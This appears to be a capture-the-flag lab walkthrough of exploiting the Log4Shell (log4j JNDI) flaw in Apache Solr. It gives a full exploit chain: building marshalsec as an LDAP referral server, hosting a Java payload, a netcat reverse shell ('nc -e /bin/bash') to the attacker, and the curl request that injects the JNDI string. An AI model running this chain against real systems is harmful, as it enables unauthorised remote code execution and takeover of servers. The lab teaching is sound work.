Exploitation

At this point, I have verified the target is in fact vulnerable by seeing this connection caught in my netcat listener. However, it made an LDAP request... so all my netcat listener may saw was non-printable characters (strange looking bytes). I can now build upon this foundation to respond with a real LDAP handler.

I will utilize a open-source and public utility to stage an "LDAP Referral Server". This will be used to essentially redirect the initial request of the victim to another location, where I can host a secondary payload that will ultimately run code on the target. This breaks down like so:

  1. ${jndi:ldap://attackerserver:1389/Resource} -> reaches out to our LDAP Referral Server

  2. LDAP Referral Server springboards the request to a secondary http://attackerserver/resource

  3. The victim retrieves and executes the code present in http://attackerserver/resource

This means we will need an HTTP server, which I could simply host with any of the following options (serving on port 8000):

  • python3 -m http.server

  • php -S 0.0.0.0:8000

  • (or any other busybox httpd or formal web service you might like)

The first order of business however is obtaining the LDAP Referral Server. I will use the marshalsec utility offered at https://github.com/mbechler/marshalsec

Ultimately, this needs to run Java. Reviewing the README for this utility, it suggests using Java 8. (You may or may not have success using a different version, but to "play by the rules,"

cd /root/Rooms/solar/marshalsec

We must build marshalsec with the Java builder maven. If you do not yet have maven on your system, you can install it through your package manager

sudo apt install maven

Next, run the command to build the marshalsec utility:

mvn clean package -DskipTests

With the marshalsec utility built, I can start an LDAP referral server to direct connections to my secondary HTTP server

java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://YOUR.ATTACKER.IP.ADDRESS:8000/#Exploit"

Adjust the IP address for your attacking machine as needed. Note that we will supplied the HTTP port listening on 8000.

Now that my LDAP server is ready and waiting, I can open a second terminal window to prepare my final payload and secondary HTTP server.

Ultimately, the log4j vulnerability will execute arbitrary code that you craft within the Java programming language. If you aren't familiar with Java, no problem, there is a simple syntax that "shells out" to running a system command. In fact, I will retrieve a reverse-shell connection so I can gain control over the target machine!

For this payload, I will execute a command on the target, specifically nc -e /bin/bash to call back to my attacker machine. This target has been configured with ncat for ease of exploitation, though I may consider experimenting with other payloads.

Payload created and compiled, I can now host it by spinning up a temporary HTTP server.

python3 -m http.server

nc -lvnp 9999

curl 'http://10.10.157.119:8983/solr/admin/cores?foo=${jndi:ldap://YOUR.ATTACKER.IP.ADDRESS:1389/Exploit}'

PreviousProof of ConceptNextBasic Authentication Bypass

Last updated